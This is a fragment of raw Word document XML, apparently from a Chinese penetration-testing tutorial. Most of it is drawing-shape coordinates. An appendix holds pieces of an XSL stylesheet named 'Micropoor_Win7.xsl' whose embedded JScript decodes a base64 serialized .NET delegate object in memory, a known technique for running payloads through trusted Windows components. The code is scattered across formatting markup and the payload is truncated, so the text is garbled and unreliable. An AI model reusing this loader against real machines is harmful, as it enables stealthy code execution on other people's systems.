,13381,5748,13381,5746,13381,5745,13381,5743,13381,5742,13381,5740,13381,5738,13381,5737,13381,5735,13381,5733,13381,5731,13381,5730,13381,5728,13381,5726,13381,5724,13381,5722,13381,5720,13381,5718,13381,5716,13381,5714,13381,5711,13381,5709,13381,5707,13381,5704,13381,5702,13381,5700,13381,5697,13381,5695,13381,5692,13381,5689,13381,5687,13381,5684,13381,5681,13381,5679,13381,5676,13381,5673,13381,5670,13381,5667,13381,5667,13381,5667,13381,5667,13381,5667,13381,5667,13381,5667,13381,5667,13381,5667,13381,5667,13381,5667,13381,5667,13381,5667,13381,5667,13380,5667,13380,5667,13380,5667,13380,5667,13380,5667,13380,5667,13380,5667,13380,5667,13380,5667,13379,5667,13379,5667,13379,5667,13379,5667,13378,5667,13378,5667,13378,5667,13377,5667,13377,5667,13377,5667,13376,5667,13376,5667,13375,5667,13375,5667,13374,5667,13374,5667,13373,5667,13372,5667,13372,5667,13371,5667,13370,5667,13370,5667,13369,5667,13368,5667,13367,5667,13366,5667,13365,5667,13364,5667,13363,5667,13362,5667,13361,5667,13359,5667,13358,5667,13357,5667,13356,5667,13354,5667,13353,5667,13351,5667,13350,5667,13348,5667,13346,5667,13345,5667,13343,5667,13341,5667,13339,5667,13337,5667,13335,5667,13333,5667,13331,5667,13329,5667,13327,5667,13324,5667,13322,5667,13319,5667,13317,5667,13314,5667,13312,5667,13309,5667,13306,5667,13303,5667,13300,5667,13297,5667,13294,5667,13291,5667,13288,5667,13284,5667,13281,5667,13278,5667,13274,5667,13270,5667,13267,5667,13263,5667,13259,5667,13255,5667,13251,5667,13247,5667,13243,5667,13238,5667,13234,5667,13229,5667,13225,5667,13220,5667,13215,5667,13210,5667,13205,5667,13200,5667,13195,5667,13190,5667,13185,5667,13179,5667,13174,5667,13168,5667,13162,5667,13156,5667,13150,5667,13144,5667,13138,5667,13132,5667,13126e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:180.500pt;margin-top:673.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3610,13470" coordsize="130,270">
        <v:shape style="position:absolute;left:3610;top:13470;width:130;height:270" coordorigin="3610,13470" coordsize="130,270" path="m3626,13486l3626,13486,3626,13486,3626,13486,3626,13486,3626,13486,3626,13486,3626,13486,3626,13486,3626,13486,3626,13486,3626,13486,3626,13486,3626,13486,3626,13486,3626,13486,3626,13486,3626,13486,3626,13486,3626,13486,3626,13486,3626,13486,3626,13486,3627,13486,3627,13486,3627,13486,3627,13486,3627,13486,3627,13486,3627,13486,3628,13486,3628,13486,3628,13486,3628,13486,3628,13486,3629,13486,3629,13486,3629,13486,3629,13486,3630,13486,3630,13486,3630,13486,3631,13486,3631,13486,3631,13486,3632,13486,3632,13486,3633,13486,3633,13486,3634,13486,3634,13486,3635,13486,3635,13486,3636,13486,3636,13486,3637,13486,3638,13486,3638,13486,3639,13486,3640,13486,3640,13486,3641,13486,3642,13486,3643,13486,3644,13486,3645,13486,3645,13486,3646,13486,3647,13486,3648,13486,3649,13486,3650,13486,3651,13486,3652,13486,3654,13486,3655,13486,3656,13486,3657,13486,3658,13486,3660,13486,3661,13486,3662,13486,3664,13486,3665,13486,3667,13486,3668,13486,3670,13486,3671,13486,3673,13486,3674,13486,3676,13486,3678,13486,3680,13486,3681,13486,3683,13486,3685,13486,3687,13486,3689,13486,3691,13486,3693,13486,3695,13486,3697,13486,3699,13486,3701,13486,3704,13486,3706,13486,3708,13486,3711,13486,3713,13486,3716,13486,3718,13486,3721,13486,3723,13486,3726,13486,3729,13486,3731,13486,3734,13486,3737,13486,3740,13486,3743,13486,3746,13486,3746,13486,3746,13486,3746,13486,3746,13486,3746,13486,3746,13486,3746,13486,3746,13486,3746,13486,3746,13486,3746,13486,3746,13486,3746,13486,3746,13486,3746,13486,3746,13486,3746,13486,3746,13487,3746,13487,3746,13487,3746,13487,3746,13487,3746,13487,3746,13488,3746,13488,3746,13488,3746,13488,3746,13489,3746,13489,3746,13489,3746,13490,3746,13490,3746,13491,3746,13491,3746,13492,3746,13492,3746,13493,3746,13493,3746,13494,3746,13495,3746,13495,3746,13496,3746,13497,3746,13498,3746,13499,3746,13500,3746,13501,3746,13502,3746,13503,3746,13504,3746,13505,3746,13506,3746,13507,3746,13508,3746,13510,3746,13511,3746,13512,3746,13514,3746,13515,3746,13517,3746,13518,3746,13520,3746,13522,3746,13524,3746,13525,3746,13527,3746,13529,3746,13531,3746,13533,3746,13536,3746,13538,3746,13540,3746,13542,3746,13545,3746,13547,3746,13550,3746,13552,3746,13555,3746,13558,3746,13560,3746,13563,3746,13566,3746,13569,3746,13572,3746,13576,3746,13579,3746,13582,3746,13585,3746,13589,3746,13593,3746,13596,3746,13600,3746,13604,3746,13608,3746,13612,3746,13616,3746,13620,3746,13624,3746,13628,3746,13633,3746,13637,3746,13642,3746,13646,3746,13651,3746,13656,3746,13661,3746,13666,3746,13671,3746,13677,3746,13682,3746,13687,3746,13693,3746,13698,3746,13704,3746,13710,3746,13716,3746,13722,3746,13728,3746,13735,3746,13741,3746,13741,3746,13741,3746,13741,3746,13741,3746,13741,3746,13741,3746,13741,3746,13741,3746,13741,3746,13741,3746,13741,3746,13741,3746,13741,3746,13741,3746,13741,3746,13741,3746,13741,3746,13741,3745,13741,3745,13741,3745,13741,3745,13741,3745,13741,3745,13741,3745,13741,3745,13741,3745,13741,3744,13741,3744,13741,3744,13741,3744,13741,3744,13741,3744,13741,3743,13741,3743,13741,3743,13741,3743,13741,3742,13741,3742,13741,3742,13741,3741,13741,3741,13741,3741,13741,3740,13741,3740,13741,3739,13741,3739,13741,3738,13741,3738,13741,3738,13741,3737,13741,3736,13741,3736,13741,3735,13741,3735,13741,3734,13741,3733,13741,3733,13741,3732,13741,3731,13741,3730,13741,3730,13741,3729,13741,3728,13741,3727,13741,3726,13741,3725,13741,3724,13741,3723,13741,3722,13741,3721,13741,3720,13741,3719,13741,3718,13741,3717,13741,3716,13741,3715,13741,3713,13741,3712,13741,3711,13741,3709,13741,3708,13741,3707,13741,3705,13741,3704,13741,3702,13741,3701,13741,3699,13741,3697,13741,3696,13741,3694,13741,3692,13741,3690,13741,3689,13741,3687,13741,3685,13741,3683,13741,3681,13741,3679,13741,3677,13741,3675,13741,3672,13741,3670,13741,3668,13741,3666,13741,3663,13741,3661,13741,3659,13741,3656,13741,3654,13741,3651,13741,3648,13741,3646,13741,3643,13741,3640,13741,3638,13741,3635,13741,3632,13741,3629,13741,3626,13741,3626,13741,3626,13741,3626,13741,3626,13741,3626,13741,3626,13741,3626,13741,3626,13741,3626,13741,3626,13741,3626,13741,3626,13741,3626,13741,3626,13741,3626,13741,3626,13740,3626,13740,3626,13740,3626,13740,3626,13740,3626,13740,3626,13740,3626,13739,3626,13739,3626,13739,3626,13739,3626,13738,3626,13738,3626,13738,3626,13737,3626,13737,3626,13736,3626,13736,3626,13735,3626,13735,3626,13734,3626,13734,3626,13733,3626,13733,3626,13732,3626,13731,3626,13730,3626,13730,3626,13729,3626,13728,3626,13727,3626,13726,3626,13725,3626,13724,3626,13723,3626,13722,3626,13721,3626,13720,3626,13718,3626,13717,3626,13716,3626,13714,3626,13713,3626,13711,3626,13710,3626,13708,3626,13707,3626,13705,3626,13703,3626,13701,3626,13699,3626,13697,3626,13695,3626,13693,3626,13691,3626,13689,3626,13687,3626,13684,3626,13682,3626,13680,3626,13677,3626,13674,3626,13672,3626,13669,3626,13666,3626,13663,3626,13660,3626,13657,3626,13654,3626,13651,3626,13648,3626,13645,3626,13641,3626,13638,3626,13634,3626,13631,3626,13627,3626,13623,3626,13619,3626,13615,3626,13611,3626,13607,3626,13603,3626,13598,3626,13594,3626,13590,3626,13585,3626,13580,3626,13575,3626,13571,3626,13566,3626,13561,3626,13555,3626,13550,3626,13545,3626,13539,3626,13534,3626,13528,3626,13522,3626,13517,3626,13511,3626,13505,3626,13498,3626,13492,3626,13486e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:216.500pt;margin-top:745.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4330,14910" coordsize="130,270">
        <v:shape style="position:absolute;left:4330;top:14910;width:130;height:270" coordorigin="4330,14910" coordsize="130,270" path="m4346,14927l4346,14927,4346,14927,4346,14927,4346,14927,4346,14927,4346,14927,4346,14927,4346,14927,4346,14927,4346,14927,4346,14927,4346,14927,4346,14927,4346,14927,4346,14927,4346,14927,4346,14927,4347,14927,4347,14927,4347,14927,4347,14927,4347,14927,4347,14927,4347,14927,4347,14927,4347,14927,4347,14927,4348,14927,4348,14927,4348,14927,4348,14927,4348,14927,4349,14927,4349,14927,4349,14927,4349,14927,4350,14927,4350,14927,4350,14927,4350,14927,4351,14927,4351,14927,4351,14927,4352,14927,4352,14927,4353,14927,4353,14927,4354,14927,4354,14927,4355,14927,4355,14927,4356,14927,4356,14927,4357,14927,4357,14927,4358,14927,4359,14927,4359,14927,4360,14927,4361,14927,4362,14927,4362,14927,4363,14927,4364,14927,4365,14927,4366,14927,4367,14927,4368,14927,4369,14927,4370,14927,4371,14927,4372,14927,4373,14927,4374,14927,4375,14927,4376,14927,4377,14927,4379,14927,4380,14927,4381,14927,4383,14927,4384,14927,4385,14927,4387,14927,4388,14927,4390,14927,4392,14927,4393,14927,4395,14927,4396,14927,4398,14927,4400,14927,4402,14927,4403,14927,4405,14927,4407,14927,4409,14927,4411,14927,4413,14927,4415,14927,4417,14927,4420,14927,4422,14927,4424,14927,4426,14927,4429,14927,4431,14927,4433,14927,4436,14927,4438,14927,4441,14927,4444,14927,4446,14927,4449,14927,4452,14927,4455,14927,4457,14927,4460,14927,4463,14927,4466,14927,4466,14927,4466,14927,4466,14927,4466,14927,4466,14927,4466,14927,4466,14927,4466,14927,4466,14927,4466,14927,4466,14927,4466,14927,4466,14927,4466,14927,4466,14927,4466,14927,4466,14927,4466,14927,4466,14927,4466,14928,4466,14928,4466,14928,4466,14928,4466,14928,4466,14929,4466,14929,4466,14929,4466,14930,4466,14930,4466,14930,4466,14931,4466,14931,4466,14931,4466,14932,4466,14932,4466,14933,4466,14934,4466,14934,4466,14935,4466,14936,4466,14936,4466,14937,4466,14938,4466,14939,4466,14939,4466,14940,4466,14941,4466,14942,4466,14943,4466,14944,4466,14945,4466,14947,4466,14948,4466,14949,4466,14950,4466,14952,4466,14953,4466,14955,4466,14956,4466,14958,4466,14959,4466,14961,4466,14963,4466,14964,4466,14966,4466,14968,4466,14970,4466,14972,4466,14974,4466,14976,4466,14978,4466,14981,4466,14983,4466,14985,4466,14988,4466,14990,4466,14993,4466,14996,4466,14998,4466,15001,4466,15004,4466,15007,4466,15010,4466,15013,4466,15016,4466,15019,4466,15023,4466,15026,4466,15030,4466,15033,4466,15037,4466,15041,4466,15044,4466,15048,4466,15052,4466,15056,4466,15060,4466,15065,4466,15069,4466,15073,4466,15078,4466,15083,4466,15087,4466,15092,4466,15097,4466,15102,4466,15107,4466,15112,4466,15117,4466,15123,4466,15128,4466,15134,4466,15139,4466,15145,4466,15151,4466,15157,4466,15163,4466,15169,4466,15175,4466,15182,4466,15182,4466,15182,4466,15182,4466,15182,4466,15182,4466,15182,4466,15182,4466,15182,4466,15182,4466,15182,4466,15182,4466,15182,4466,15182,4466,15182,4466,15182,4466,15182,4466,15182,4466,15182,4466,15182,4466,15182,4466,15182,4466,15182,4465,15182,4465,15182,4465,15182,4465,15182,4465,15182,4465,15182,4465,15182,4465,15182,4464,15182,4464,15182,4464,15182,4464,15182,4463,15182,4463,15182,4463,15182,4463,15182,4462,15182,4462,15182,4462,15182,4461,15182,4461,15182,4461,15182,4460,15182,4460,15182,4459,15182,4459,15182,4458,15182,4458,15182,4457,15182,4457,15182,4456,15182,4456,15182,4455,15182,4454,15182,4454,15182,4453,15182,4452,15182,4452,15182,4451,15182,4450,15182,4449,15182,4448,15182,4448,15182,4447,15182,4446,15182,4445,15182,4444,15182,4443,15182,4442,15182,4441,15182,4440,15182,4439,15182,4437,15182,4436,15182,4435,15182,4434,15182,4432,15182,4431,15182,4430,15182,4428,15182,4427,15182,4426,15182,4424,15182,4422,15182,4421,15182,4419,15182,4418,15182,4416,15182,4414,15182,4413,15182,4411,15182,4409,15182,4407,15182,4405,15182,4403,15182,4401,15182,4399,15182,4397,15182,4395,15182,4393,15182,4391,15182,4388,15182,4386,15182,4384,15182,4381,15182,4379,15182,4377,15182,4374,15182,4371,15182,4369,15182,4366,15182,4363,15182,4361,15182,4358,15182,4355,15182,4352,15182,4349,15182,4346,15182,4346,15182,4346,15182,4346,15182,4346,15182,4346,15182,4346,15182,4346,15182,4346,15182,4346,15182,4346,15182,4346,15182,4346,15181,4346,15181,4346,15181,4346,15181,4346,15181,4346,15181,4346,15181,4346,15181,4346,15181,4346,15180,4346,15180,4346,15180,4346,15180,4346,15180,4346,15179,4346,15179,4346,15179,4346,15178,4346,15178,4346,15178,4346,15177,4346,15177,4346,15176,4346,15176,4346,15175,4346,15175,4346,15174,4346,15173,4346,15173,4346,15172,4346,15171,4346,15170,4346,15170,4346,15169,4346,15168,4346,15167,4346,15166,4346,15165,4346,15164,4346,15163,4346,15162,4346,15160,4346,15159,4346,15158,4346,15156,4346,15155,4346,15154,4346,15152,4346,15151,4346,15149,4346,15147,4346,15146,4346,15144,4346,15142,4346,15140,4346,15138,4346,15136,4346,15134,4346,15132,4346,15130,4346,15127,4346,15125,4346,15123,4346,15120,4346,15118,4346,15115,4346,15113,4346,15110,4346,15107,4346,15104,4346,15101,4346,15098,4346,15095,4346,15092,4346,15089,4346,15085,4346,15082,4346,15078,4346,15075,4346,15071,4346,15068,4346,15064,4346,15060,4346,15056,4346,15052,4346,15048,4346,15043,4346,15039,4346,15035,4346,15030,4346,15026,4346,15021,4346,15016,4346,15011,4346,15006,4346,15001,4346,14996,4346,14991,4346,14986,4346,14980,4346,14975,4346,14969,4346,14963,4346,14957,4346,14951,4346,14945,4346,14939,4346,14933,4346,14927e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:259.500pt;margin-top:758.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5190,15170" coordsize="130,270">
        <v:shape style="position:absolute;left:5190;top:15170;width:130;height:270" coordorigin="5190,15170" coordsize="130,270" path="m5202,15197l5202,15197,5202,15197,5202,15197,5202,15197,5202,15197,5202,15197,5202,15197,5202,15197,5202,15197,5202,15197,5202,15197,5202,15197,5202,15197,5202,15197,5202,15197,5202,15197,5202,15197,5202,15197,5202,15197,5202,15197,5202,15197,5202,15197,5202,15197,5202,15197,5203,15197,5203,15197,5203,15197,5203,15197,5203,15197,5203,15197,5204,15197,5204,15197,5204,15197,5204,15197,5204,15197,5205,15197,5205,15197,5205,15197,5206,15197,5206,15197,5206,15197,5207,15197,5207,15197,5207,15197,5208,15197,5208,15197,5209,15197,5209,15197,5209,15197,5210,15197,5211,15197,5211,15197,5212,15197,5212,15197,5213,15197,5213,15197,5214,15197,5215,15197,5216,15197,5216,15197,5217,15197,5218,15197,5219,15197,5219,15197,5220,15197,5221,15197,5222,15197,5223,15197,5224,15197,5225,15197,5226,15197,5227,15197,5228,15197,5229,15197,5230,15197,5232,15197,5233,15197,5234,15197,5235,15197,5237,15197,5238,15197,5239,15197,5241,15197,5242,15197,5244,15197,5245,15197,5247,15197,5249,15197,5250,15197,5252,15197,5254,15197,5255,15197,5257,15197,5259,15197,5261,15197,5263,15197,5265,15197,5267,15197,5269,15197,5271,15197,5273,15197,5275,15197,5277,15197,5279,15197,5282,15197,5284,15197,5286,15197,5289,15197,5291,15197,5294,15197,5296,15197,5299,15197,5302,15197,5304,15197,5307,15197,5310,15197,5313,15197,5316,15197,5319,15197,5322,15197,5322,15197,5322,15197,5322,15197,5322,15197,5322,15197,5322,15197,5322,15197,5322,15197,5322,15197,5322,15197,5322,15197,5322,15197,5322,15197,5322,15197,5322,15197,5322,15197,5322,15197,5322,15197,5322,15198,5322,15198,5322,15198,5322,15198,5322,15198,5322,15199,5322,15199,5322,15199,5322,15199,5322,15200,5322,15200,5322,15200,5322,15201,5322,15201,5322,15202,5322,15202,5322,15203,5322,15203,5322,15204,5322,15204,5322,15205,5322,15206,5322,15206,5322,15207,5322,15208,5322,15209,5322,15210,5322,15210,5322,15211,5322,15212,5322,15213,5322,15214,5322,15216,5322,15217,5322,15218,5322,15219,5322,15220,5322,15222,5322,15223,5322,15225,5322,15226,5322,15228,5322,15229,5322,15231,5322,15233,5322,15235,5322,15236,5322,15238,5322,15240,5322,15242,5322,15244,5322,15246,5322,15249,5322,15251,5322,15253,5322,15256,5322,15258,5322,15261,5322,15263,5322,15266,5322,15269,5322,15271,5322,15274,5322,15277,5322,15280,5322,15283,5322,15286,5322,15290,5322,15293,5322,15296,5322,15300,5322,15303,5322,15307,5322,15311,5322,15315,5322,15318,5322,15322,5322,15326,5322,15331,5322,15335,5322,15339,5322,15344,5322,15348,5322,15353,5322,15357,5322,15362,5322,15367,5322,15372,5322,15377,5322,15382,5322,15387,5322,15393,5322,15398,5322,15404,5322,15409,5322,15415,5322,15421,5322,15427,5322,15433,5322,15439,5322,15445,5322,15452,5322,15452,5322,15452,5322,15452,5322,15452,5322,15452,5322,15452,5322,15452,5322,15452,5322,15452,5322,15452,5322,15452,5322,15452,5322,15452,5322,15452,5321,15452,5321,15452,5321,15452,5321,15452,5321,15452,5321,15452,5321,15452,5321,15452,5321,15452,5321,15452,5321,15452,5321,15452,5320,15452,5320,15452,5320,15452,5320,15452,5320,15452,5320,15452,5319,15452,5319,15452,5319,15452,5319,15452,5318,15452,5318,15452,5318,15452,5317,15452,5317,15452,5317,15452,5316,15452,5316,15452,5316,15452,5315,15452,5315,15452,5314,15452,5314,15452,5313,15452,5313,15452,5312,15452,5312,15452,5311,15452,5310,15452,5310,15452,5309,15452,5308,15452,5308,15452,5307,15452,5306,15452,5306,15452,5305,15452,5304,15452,5303,15452,5302,15452,5301,15452,5300,15452,5299,15452,5298,15452,5297,15452,5296,15452,5295,15452,5294,15452,5293,15452,5292,15452,5290,15452,5289,15452,5288,15452,5287,15452,5285,15452,5284,15452,5282,15452,5281,15452,5279,15452,5278,15452,5276,15452,5275,15452,5273,15452,5271,15452,5270,15452,5268,15452,5266,15452,5264,15452,5263,15452,5261,15452,5259,15452,5257,15452,5255,15452,5253,15452,5250,15452,5248,15452,5246,15452,5244,15452,5242,15452,5239,15452,5237,15452,5234,15452,5232,15452,5229,15452,5227,15452,5224,15452,5222,15452,5219,15452,5216,15452,5213,15452,5210,15452,5208,15452,5205,15452,5202,15452,5202,15452,5202,15452,5202,15452,5202,15452,5202,15452,5202,15452,5202,15452,5202,15452,5202,15452,5202,15452,5202,15452,5202,15452,5202,15452,5202,15451,5202,15451,5202,15451,5202,15451,5202,15451,5202,15451,5202,15451,5202,15451,5202,15450,5202,15450,5202,15450,5202,15450,5202,15449,5202,15449,5202,15449,5202,15448,5202,15448,5202,15448,5202,15447,5202,15447,5202,15446,5202,15446,5202,15445,5202,15445,5202,15444,5202,15443,5202,15443,5202,15442,5202,15441,5202,15441,5202,15440,5202,15439,5202,15438,5202,15437,5202,15436,5202,15435,5202,15434,5202,15433,5202,15432,5202,15431,5202,15429,5202,15428,5202,15427,5202,15425,5202,15424,5202,15422,5202,15421,5202,15419,5202,15417,5202,15416,5202,15414,5202,15412,5202,15410,5202,15408,5202,15406,5202,15404,5202,15402,5202,15400,5202,15398,5202,15395,5202,15393,5202,15390,5202,15388,5202,15385,5202,15383,5202,15380,5202,15377,5202,15374,5202,15371,5202,15368,5202,15365,5202,15362,5202,15359,5202,15355,5202,15352,5202,15349,5202,15345,5202,15341,5202,15338,5202,15334,5202,15330,5202,15326,5202,15322,5202,15318,5202,15314,5202,15309,5202,15305,5202,15300,5202,15296,5202,15291,5202,15286,5202,15281,5202,15277,5202,15271,5202,15266,5202,15261,5202,15256,5202,15250,5202,15245,5202,15239,5202,15233,5202,15227,5202,15222,5202,15215,5202,15209,5202,15203,5202,1519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4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附录：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5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Micropoor_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Win7.xsl：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?xml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'1.0'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?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8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stylesheet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xmlns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"http://www.w3.org/1999/XSL/Transform"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xmlns:ms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"urn:schemas‐mic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roso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ft‐com:xslt"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xmlns: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"placeholder"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"1.0"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method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"text"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ms:script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implements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prefix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"user"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language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"JScript"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753" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="11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CDATA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4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setversion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11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="-2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debug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{}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5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5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>function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enc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"System.Text.ASCIIEncoding"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="2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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="2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3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35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GetByteCount_2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16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="21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29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ba</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="2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7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enc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GetBytes_4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17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"System.Security.Cryptography.FromB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ase64Transform"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18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ba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TransformFinalBlock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="1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ba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80053"/>
          <w:spacing w:val="5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length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19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ms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6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"System.IO.MemoryStream"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="22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20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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Write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ba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4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,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length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4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*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="2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3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21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="17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Position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2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0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22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing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ms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62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23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24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="2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25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serialized_obj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="12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1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"AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdh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dGVTZXJpYWxpemF0aW9uSG9sZGVy"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6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8,2800,1340,2800,1341,2800,1343,2800,1344,2800,1346,2800,1347,2800,1349,2800,1351,2800,1353,2800,1354,2800,1356,2800,1358,2800,1360,2800,1362,2800,1364,2800,1367,2800,1369,2800,1371,2800,1374,2800,1376,2800,1379,2800,1381,2800,1384,2800,1387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8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7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3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1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7,2680,2825,2680,2824,2680,2823,2680,2822,2680,2820,2680,2819,2680,2817,2680,2816,2680,2814,2680,2813,2680,2811,2680,2809,2680,2808,2680,2806,2680,2804,2680,2802,2680,2800,2680,2798,2680,2796,2680,2793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299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0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5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4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8,2680,4705,2680,4703,2680,4700,2680,4697,2680,4695,2680,4692,2680,4689,2680,4686,2680,4683,2680,4680,2680,4677,2680,4673,2680,4670,2680,4667,2680,4663,2680,4660,2680,4656,2680,4652,2680,4649,2680,4645,2680,4641,2680,4637,2680,4632,2680,4628,2680,4624,2680,4619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6,2680,5395,2680,5395,2680,5395,2680,5395,2680,5394,2680,5394,2680,5394,2680,5393,2680,5393,2680,5393,2680,5392,2680,5392,2680,5391,2680,5391,2680,5390,2680,5390,2680,5389,2680,5388,2680,5388,2680,5387,2680,5386,2680,5385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3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20,2680,6018,2680,6017,2680,6015,2680,6014,2680,6013,2680,6011,2680,6009,2680,6008,2680,6006,2680,6004,2680,6002,2680,6000,2680,5999,2680,5997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5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9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7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7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8,2800,8513,2800,8519,2800,8524,2800,8529,2800,8534,2800,8540,2800,8545,2800,8551,2800,8557,2800,8562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4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33.500pt;margin-top:479.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,9590" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:9590;width:130;height:270" coordorigin="2670,9590" coordsize="130,270" path="m2680,9614l2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2682,9614,2682,9614,2682,9614,2682,9614,2682,9614,2682,9614,2683,9614,2683,9614,2683,9614,2683,9614,2684,9614,2684,9614,2684,9614,2685,9614,2685,9614,2685,9614,2686,9614,2686,9614,2686,9614,2687,9614,2687,9614,2688,9614,2688,9614,2689,9614,2689,9614,2690,9614,2690,9614,2691,9614,2692,9614,2692,9614,2693,9614,2694,9614,2694,9614,2695,9614,2696,9614,2697,9614,2697,9614,2698,9614,2699,9614,2700,9614,2701,9614,2702,9614,2703,9614,2704,9614,2705,9614,2706,9614,2707,9614,2708,9614,2709,9614,2710,9614,2712,9614,2713,9614,2714,9614,2715,9614,2717,9614,2718,9614,2720,9614,2721,9614,2723,9614,2724,9614,2726,9614,2727,9614,2729,9614,2731,9614,2732,9614,2734,9614,2736,9614,2738,9614,2740,9614,2741,9614,2743,9614,2745,9614,2747,9614,2749,9614,2752,9614,2754,9614,2756,9614,2758,9614,2760,9614,2763,9614,2765,9614,2768,9614,2770,9614,2773,9614,2775,9614,2778,9614,2780,9614,2783,9614,2786,9614,2789,9614,2792,9614,2794,9614,2797,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9615,2800,9615,2800,9615,2800,9615,2800,9615,2800,9615,2800,9616,2800,9616,2800,9616,2800,9617,2800,9617,2800,9617,2800,9618,2800,9618,2800,9618,2800,9619,2800,9619,2800,9620,2800,9620,2800,9621,2800,9622,2800,9622,2800,9623,2800,9624,2800,9624,2800,9625,2800,9626,2800,9627,2800,9628,2800,9629,2800,9630,2800,9631,2800,9632,2800,9633,2800,9634,2800,9635,2800,9636,2800,9638,2800,9639,2800,9640,2800,9642,